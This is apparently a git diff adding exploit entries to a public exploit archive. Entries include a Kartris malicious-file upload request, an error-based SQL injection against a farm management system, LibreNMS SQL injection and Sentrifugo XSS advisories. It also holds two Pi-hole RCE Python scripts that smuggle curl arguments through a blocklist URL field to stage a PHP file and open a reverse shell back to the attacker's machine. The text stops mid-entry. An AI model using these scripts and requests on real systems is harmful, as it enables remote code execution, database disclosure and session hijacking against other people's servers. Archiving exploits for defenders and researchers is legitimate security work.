diff --git a/exploits/aspx/webapps/48445.txt b/exploits/aspx/webapps/48445.txt
new file mode 100644
index 000000000..d5ef619b2
--- /dev/null
+++ b/exploits/aspx/webapps/48445.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Kartris 1.6 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2020-05-08
+# Exploit Author: Nhat Ha - Sun CSR
+# Vendor Homepage: https://www.cactusoft.com/
+# Software Link: https://www.kartris.com/
+# Version: 1.6
+# Category: Webapps
+# Tested on: WiN10_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: https://localhost/Admin/_GeneralFiles.aspx
+#
+POST /Admin/_GeneralFiles.aspx HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
+Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------9604487443072642880454762058
+Content-Length: 18484
+Origin: 192.168.1.1
+Connection: close
+Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx
+Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096;
+ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w;
+KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx
+Upgrade-Insecure-Requests: 1
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="scrManager_HiddenField"
+
+;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral,
+PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1;
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_ExpandState"
+
+cccccccccc
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_SelectedNode"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_PopulateLog"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$scrManager"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$filUploader";
+filename="malicious.aspx"
+Content-Type: text/plain
+
+[Content Malicious File Here ! ]
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth"
+
+170px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth"
+
+500px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$phdMain$lnkUpload
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+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
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+54DD7DF0
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED"
+
+
+-----------------------------9604487443072642880454762058--
+
+
+# Access malicious file following the link:
+https://localhost/uploads/General/malicious.aspx
+# How to fix: Update the latest version
+# Commit fix:
+https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c
\ No newline at end of file
diff --git a/exploits/linux/webapps/48442.py b/exploits/linux/webapps/48442.py
new file mode 100755
index 000000000..e6bad5469
--- /dev/null
+++ b/exploits/linux/webapps/48442.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+if len(sys.argv) == 6:
+ ROOT = True
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Second Callback")
+ print("[+] Uploading Payload")
+ conn.sendall(bytes(payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
diff --git a/exploits/linux/webapps/48443.py b/exploits/linux/webapps/48443.py
new file mode 100755
index 000000000..51f4dc944
--- /dev/null
+++ b/exploits/linux/webapps/48443.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+shell_payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+root_payload = """
+"""
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ elif thread_name == "T2":
+ print("[+] Received Second Callback")
+ print("[+] Uploading Root Payload")
+ conn.sendall(bytes(root_payload, "utf-8"))
+ elif thread_name == "T3":
+ print("[+] Received Third Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Fourth Callback")
+ print("[+] Uploading Shell Payload")
+ conn.sendall(bytes(shell_payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Root Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload of root redirect
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T3",))
+
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Shell Stager Success")
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T4",))
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48453.txt b/exploits/multiple/webapps/48453.txt
new file mode 100644
index 000000000..f9b61877b
--- /dev/null
+++ b/exploits/multiple/webapps/48453.txt
@@ -0,0 +1,55 @@
+# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
+# Google Dork:unknown
+# Date: 2019-09-01
+# Exploit Author: Punt
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://www.librenms.org
+# Version:1.46 and less
+# Tested on:Linux and Windows
+# CVE: N/A
+
+#Affected Device: more than 4k found on Shodan and Censys.
+
+#Description about the bug
+Vunlerable script /html/ajax_serarch.php
+
+if (isset($_REQUEST['search'])) {
+ $search = mres($_REQUEST['search']);
+ header('Content-type: application/json');
+ if (strlen($search) > 0) {
+ $found = 0;
+
+ if ($_REQUEST['type'] == 'group') {
+ include_once '../includes/device-groups.inc.php';
+ foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
+ if ($_REQUEST['map']) {
+ $results[] = array(
+ 'name' => 'g:'.$group['name'],
+ 'group_id' => $group['id'],
+
+
+as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
+
+dbFetchRows() used to exectute sql query
+
+now lets check the mres() function
+
+the mres() fuction is located under /includes/common.php
+
+function mres($string)
+{
+ return $string; //
+ global $database_link;
+ return mysqli_real_escape_string($database_link, $string);
+
+as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
+
+
+#POC:
+1st lgoin to your LibreNMS
+2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
+3rd you will see an sql syntax error
+
+The Librenms team have applyed a patch .
+Thanks
+Punt (From Ethiopia)
\ No newline at end of file
diff --git a/exploits/php/webapps/48244.txt b/exploits/php/webapps/48244.txt
index 9edd4d31c..7122bec86 100644
--- a/exploits/php/webapps/48244.txt
+++ b/exploits/php/webapps/48244.txt
@@ -6,7 +6,7 @@
# Software Link: https://en.ulicms.de/current_versions.html
# Version: 2020.1
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12704
### Vulnerability : Stored Cross-Site Scripting
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
index 01f7d3944..44d905674 100644
--- a/exploits/php/webapps/48250.txt
+++ b/exploits/php/webapps/48250.txt
@@ -7,7 +7,7 @@
https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
# Version: 4.5.0
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12707
### Vulnerability : Persistent Cross-Site Scripting
diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt
index 36428e78b..54a6f9ee3 100644
--- a/exploits/php/webapps/48404.txt
+++ b/exploits/php/webapps/48404.txt
@@ -6,7 +6,7 @@
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
# Version: 9.03.50
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12706
### Vulnerability : Persistent Cross-Site Scripting
diff --git a/exploits/php/webapps/48444.txt b/exploits/php/webapps/48444.txt
new file mode 100644
index 000000000..358753c78
--- /dev/null
+++ b/exploits/php/webapps/48444.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
+# Date: 2020-05-06
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: uname
+# Injected Request
+#Below request will print database name and MariaDB version.
+
+POST /fms/Login/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 204
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/fms/index.php
+Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco
+Upgrade-Insecure-Requests: 1
+
+uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1
+
+
+
+-----------------------------------------------------------------------------------------------------------------------------
+#Response
+HTTP/1.1 302 Found
+Date: Wed, 06 May 2020 13:21:36 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5
+X-Powered-By: PHP/7.4.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: error.php
+Content-Length: 356
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+Warning: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in
\ No newline at end of file
diff --git a/exploits/php/webapps/48446.txt b/exploits/php/webapps/48446.txt
new file mode 100644
index 000000000..4483f8ccf
--- /dev/null
+++ b/exploits/php/webapps/48446.txt
@@ -0,0 +1,148 @@
+# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
+# Dork: N/A
+# Date: 2020-05-06
+# Exploit Author: Vulnerability-Lab
+# Vendor: http://www.sentrifugo.com/
+# Link: http://www.sentrifugo.com/download
+# Version: 3.2
+# Category: Webapps
+# CVE: N/A
+
+Document Title:
+===============
+Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2229
+
+
+Product & Service Introduction:
+===============================
+http://www.sentrifugo.com/
+http://www.sentrifugo.com/download
+
+
+Affected Product(s):
+====================
+Sentrifugo
+Product: Sentrifugo v3.2 - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Mahara v19.10.2 CMS web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `expense_name` parameters
+of the `/expenses/expenses/edit` module in the `index.php` file.
+Remote attackers with low privileges are able to inject own malicious
+persistent script code as expenses entry. The injected code can
+be used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector is located
+on the application-side. Entries of expenses can be reviewed in the
+backend by higher privileged accounts as well.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] index.php/expenses/expenses/edit
+
+Vulnerable Input(s):
+[+] Expenses Name
+
+Vulnerable File(s):
+[+] index.php
+
+Vulnerable Parameter(s):
+[+] expense_name
+
+Affected Module(s):
+[+] index.php/expenses/expenses
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Vulnerable Source
+
+
+
+
+
+
+
+
+
+
+
+
+
+--- PoC Session Logs [POST] --- (Expenses Inject)
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Host: sentrifugo.localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 352
+Origin: http://sentrifugo.localhost:8080
+Connection: keep-alive
+Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;
+_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443
+id=&limit=&offset=¶meter=all¤cyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&
+expense_name=&category_id=&project_id=&expense_date=&expense_currency_id=2&
+expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.2.22 (Ubuntu)
+X-Powered-By: PHP/5.3.10-1ubuntu3.10
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 19284
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+
+Reference(s):
+http://sentrifugo.localhost:8080/index.php
+http://sentrifugo.localhost:8080/index.php/expenses
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/48447.txt b/exploits/php/webapps/48447.txt
new file mode 100644
index 000000000..16134af4c
--- /dev/null
+++ b/exploits/php/webapps/48447.txt
@@ -0,0 +1,37 @@
+# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
+# Date: 2020-05-08
+# Author: Besim ALTINOK
+# Vendor Homepage: https://cutephp.com
+# Software Link: https://cutephp.com/click.php?cutenews_latest
